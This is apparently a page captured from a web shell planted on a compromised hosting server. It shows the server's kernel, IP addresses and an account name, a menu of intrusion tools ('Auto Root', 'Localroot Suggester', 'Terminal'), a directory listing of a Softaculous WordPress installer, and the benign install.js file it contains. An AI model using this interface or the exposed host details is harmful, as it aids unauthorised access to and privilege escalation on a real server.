Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp50 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
languages
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
php53
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
php56
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
php71
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
php81
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
php82
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
plugins
[ DIR ]
drwxr-xr-x
2025-10-21 10:23
.htaccess
419
B
-rwxr-xr-x
2021-12-23 00:54
_htaccess
265
B
-rwxr-xr-x
2021-12-23 00:54
_index.php
59
B
-rwxr-xr-x
2021-12-23 00:54
_wp-config.php
2.9
KB
-rwxr-xr-x
2021-12-23 00:54
add_user.php
461
B
-rwxr-xr-x
2021-12-23 00:54
backup.php
3.05
KB
-rwxr-xr-x
2025-10-13 02:39
check_charset.php
2.02
KB
-rwxr-xr-x
2021-12-23 00:54
clone.php
30.99
KB
-rwxr-xr-x
2025-10-13 02:39
clone.xml
497
B
-rwxr-xr-x
2021-12-23 00:54
edit.php
9.45
KB
-rwxr-xr-x
2025-10-13 02:39
edit.xml
1.76
KB
-rwxr-xr-x
2023-10-02 22:59
extend.php
82.92
KB
-rwxr-xr-x
2025-10-13 02:39
fileindex.php
291
B
-rwxr-xr-x
2021-12-23 00:54
import.php
6.5
KB
-rwxr-xr-x
2025-10-13 02:39
info.xml
14.91
KB
-rwxr-xr-x
2025-10-13 02:36
install.js
1.46
KB
-rwxr-xr-x
2025-01-03 02:25
install.php
31.33
KB
-rwxr-xr-x
2025-10-13 02:39
install.xml
5.66
KB
-rwxr-xr-x
2025-02-23 20:15
md5
6.42
KB
-rwxr-xr-x
2025-10-13 02:39
multisite.sql
35.25
KB
-rwxr-xr-x
2025-10-13 02:36
notes.txt
5.43
KB
-rwxr-xr-x
2025-10-13 02:36
plugin_activate.php
596
B
-rwxr-xr-x
2021-12-23 00:54
plugin_deactivate.php
613
B
-rwxr-xr-x
2021-12-23 00:54
sign_on.php
3.28
KB
-rwxr-xr-x
2025-01-27 22:07
soft.htaccess
127
B
-rwxr-xr-x
2021-12-23 00:54
upgrade.php
13.3
KB
-rwxr-xr-x
2025-10-13 02:39
upgrade.xml
1.6
KB
-rwxr-xr-x
2023-10-02 22:59
wp-config.php
2.62
KB
-rwxr-xr-x
2021-12-23 00:54
wp50.sql
28.64
KB
-rwxr-xr-x
2025-10-13 02:36
wp50.zip
13.51
MB
-rwxr-xr-x
2025-10-13 02:36
Save
Rename
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; }; //we need to hide pro plugin description below wordpress 6.6 document.querySelectorAll(".plugins-list").forEach(function (element) { const parentDiv = element.parentElement; if (parentDiv && parentDiv.parentElement) { const siblingSpans = parentDiv.parentElement.querySelectorAll(":scope > span"); siblingSpans.forEach(function (span) { if (span.offsetParent !== null) { setTimeout(function () { span.style.display = "none"; }, 100); } }); } });